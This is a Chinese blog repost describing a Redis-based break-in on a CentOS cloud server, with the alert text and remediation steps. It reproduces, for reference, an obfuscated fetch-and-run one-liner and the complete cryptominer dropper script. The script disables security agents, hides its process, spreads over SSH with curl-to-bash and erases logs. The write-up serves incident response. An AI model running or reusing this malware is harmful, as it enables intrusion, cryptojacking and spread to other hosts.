centos病毒
作者:互联网
#!/bin/bash exec &>/dev/null {echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4Kc2xlZXAgJCg oUkFORE9NICUgNjAwKSkKKHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuaW8vY3Jvbi5zaCB8fCBjdXJsIC1mc1NMa0EtIHJh cGlkN2NwZnFud3hvZG8udG9yMndlYi5pby9jcm9uLnNoIHx8IHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuZnlpL2Nyb24uc 2ggfHwgY3VybCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuZnlpL2Nyb24uc2ggfHwgd2dldCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIHJhcGlkN2NwZnFud3 hvZG8ub25pb24uc2gvY3Jvbi5zaCB8fCBjdXJsIC1mc1NMa0EtIHJhcGlkN2NwZnFud3hvZG8ub25pb24uc2gvY3Jvbi5zaCApfGJhc2gK}|{base64,-d}|bash
事件回顾:阿里云服务器中毒了,接到短信通知
事件说明:云盾基于大数据机器学习检测引擎,检测到您的服务器正在尝试访问一个可疑Host URL,产生该告警的原因可能是该URL很少见; 该指令历史上没被执行过; 或者该URL和恶意软件相关等原因。 检测到服务器上Redis漏洞被黑客利用向磁盘上写入了可疑文件,可能导致黑客直接获取ECS的Root权限。请及时修复Redis配置漏洞 解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件。并及时清理已运行的恶意进程。 按照下列链接进行redis配置漏洞的修复 https://help.aliyun.com/knowledge_detail/37447.html。 https://help.aliyun.com/knowledge_detail/37433.html。 同时删除告警详情中被恶意写入的ssh key文件,防止被黑客重复2次入侵。 渗透命令:/bin/sh -c curl -o- http://121.41.24.142/a7 | bash >/dev/null 2>&1 || true 其中http://121.41.24.142/a7文件内容如下,供大家参考: 1 #/bin/bash
2 if [ -f /tmp/.a10 ]; then
3 exit 101
4 fi
5 touch /tmp/.a10
6 function clean () {
7 rm -f /tmp/.a10
8 }
9
10 for f in /var/spool/cron/* /var/spool/cron/crontabs/* /etc/*crontab /etc/cron.d/*; do
11 if grep -i -q redis "$f"; then echo > "$f"; fi
12 done
13
14 if [ -f /etc/ld.so.preload ]; then
15 mv -f /etc/ld.so.preload /etc/ld.so.pre
16 fi
17 chmod -x /etc/xig
18 chmod -x /root/cranberry /tmp/cranberry /root/yam
19 chmod -x /etc/root.sh
20 chmod -x /usr/bin/gpg-agentd
21 chmod -x /usr/bin/kworker
22 chmod -x /usr/local/bin/gpg-agentd
23 killall -9 xig
24 killall -9 cranberry
25 killall -9 root.sh
26 killall -9 gpg-agentd
27 killall -9 .gpg-agent
28 killall -9 xmr-stak
29 killall -9 kworker
30 killall -9 .gpg
31 killall -9 pnscan
32 killall -9 netfs
33 killall -9 geth
34 pkill -f stratum
35 pkill -f nativesvc
36 pkill -f cryptonight
37 pkill -f minerd
38 pkill -f conn.sh
39 pkill -f /opt/yilu/
40 pkill -f /tmp/
41 pkill -f .cmd
42 pkill -f kworker
43 if grep monero7 /etc/x7/pools.txt; then
44 killall x7
45 rm -rf /etc/x7
46 fi
47 running=
48 killall x7
49 #if ps aux | grep '[b]in/x7'; then
50 # running=1
51 #fi
52 if [ -f /etc/ld.so.pre ]; then
53 mv -f /etc/ld.so.pre /etc/ld.so.preload
54 fi
55 if ! /sbin/iptables -n -L | grep -q 165.225.157.157; then
56 iptables -A INPUT -s 165.225.157.157 -j DROP
57 iptables -A OUTPUT -d 165.225.157.157 -j DROP
58 fi
59 while read h; do
60 if ! grep -q "$h" /etc/hosts; then
61 echo "$h" >> /etc/hosts
62 fi
63 done < <(echo '
64 0.0.0.0 transfer.sh
65 0.0.0.0 static.cortins.tk
66 0.0.0.0 xcn1.yiluzhuanqian.com
67 0.0.0.0 www.yiluzhuanqian.com
68 0.0.0.0 xmr.yiluzhuanqian.com
69 0.0.0.0 xmr.f2pool.com
70 0.0.0.0 stratum.f2pool.com
71 0.0.0.0 xmr.crypto-pool.fr
72 0.0.0.0 jw-js1.ppxxmr.com
73 0.0.0.0 fr.minexmr.com
74 0.0.0.0 pool.minexmr.com
75 0.0.0.0 img.namunil.com
76 0.0.0.0 cdn.namunil.com
77 0.0.0.0 chrome.zer0day.ru
78 0.0.0.0 pool.t00ls.ru
79 0.0.0.0 monerohash.com
80 0.0.0.0 z.chakpools.com
81 ')
82 if [[ "$running" -eq "1" ]]; then
83 clean
84 exit 0
85 fi
86
87 os=$(egrep -i 'debian|ubuntu|cent' -o -- /etc/issue)
88 os="${os,,}"
89 if [ -z "$os" ] && type yum; then os='cent'; fi
90 if ! grep -q 8.8.8.8 /etc/resolv.conf; then
91 echo nameserver 8.8.8.8 >> /etc/resolv.conf
92 fi
93 if ! grep -q 1.1.1.1 /etc/resolv.conf; then
94 echo nameserver 1.1.1.1 >> /etc/resolv.conf
95 fi
96
97 if [ "$os" = 'cent' ]; then
98 yum install -y at unzip wget bzip2 hwloc-devel openssl openssl-devel
99 else
100 apt-get update
101 apt-get install -y at unzip wget hwloc
102 fi
103
104 if ps aux | grep -i '[a]liyun'; then
105 wget http://update.aegis.aliyun.com/download/uninstall.sh
106 chmod +x uninstall.sh
107 ./uninstall.sh
108 wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
109 chmod +x quartz_uninstall.sh
110 ./quartz_uninstall.sh
111 rm -f uninstall.sh quartz_uninstall.sh
112 pkill aliyun-service
113 rm -fr /etc/init.d/agentwatch /usr/sbin/aliyun-service
114 rm -rf /usr/local/aegis*;
115 elif ps aux | grep -i '[y]unjing'; then
116 /usr/local/qcloud/stargate/admin/uninstall.sh
117 /usr/local/qcloud/YunJing/uninst.sh
118 /usr/local/qcloud/monitor/barad/admin/uninstall.sh
119 fi
120
121 cd /etc; wget --no-check-certificate http://121.41.24.142/${os}.tar.gz -O x7.tar.gz; tar -xvf x7.tar.gz && rm -f x7.tar.gz
122 /sbin/sysctl -w vm.nr_hugepages=128
123 chown -R root:root /etc/x7
124 (cd /etc/x7; nohup nice bin/x7 &)
125
126 if [ -f /etc/rc.sysinit ]; then
127 if ! grep x7 /etc/rc.sysinit; then sed -i '35i(cd /etc/x7; nohup nice bin/x7 &)' /etc/rc.sysinit; fi
128 elif [ -f /etc/rc.d/init.d/network ]; then
129 if ! grep x7 /etc/rc.d/init.d/network; then sed -i '64i(cd /etc/x7; nohup nice bin/x7 &)' /etc/rc.d/init.d/network; fi
130 elif [ -f /etc/init.d/networking ]; then
131 if ! grep x7 /etc/init.d/networking; then sed -i '130i(cd /etc/x7; nohup nice bin/x7 &)' /etc/init.d/networking; fi
132 fi
133
134 wget --no-check-certificate https://github.com/gianlucaborello/libprocesshider/archive/master.zip -O master.zip && unzip master.zip && rm -f master.zip && cd libprocesshider-master;
135 sed -i 's/evil_script.py/x7/' processhider.c
136 make && mv libprocesshider.so /usr/local/lib/libjdk.so && echo /usr/local/lib/libjdk.so >> /etc/ld.so.preload && cd .. && rm -rf libprocesshider-master
137
138 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
139 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://112.74.182.220/a7 | bash >/dev/null 2>&1 &' & done
140 fi
141
142 touch -r /etc/sudoers /etc/x7 /etc/ld.so.preload /etc/hosts
143 echo "echo | tee /var/log/cron /var/spool/mail/root /var/mail/root" | at now + 1 minutes
144
145 clean
146 history -c
147 exit 0
服务器现象:服务器CPU突增,且.ssh/authorized_keys被写入恶意信息,文件也被加上了特殊权限i,禁止root权限删除该文件
解决:修复redis漏洞,取消i权限并清空authorized_keys文件,防止二次入侵
标签:centos,etc,sh,killall,fi,root,x7,病毒 来源: https://www.cnblogs.com/abkn/p/10650355.html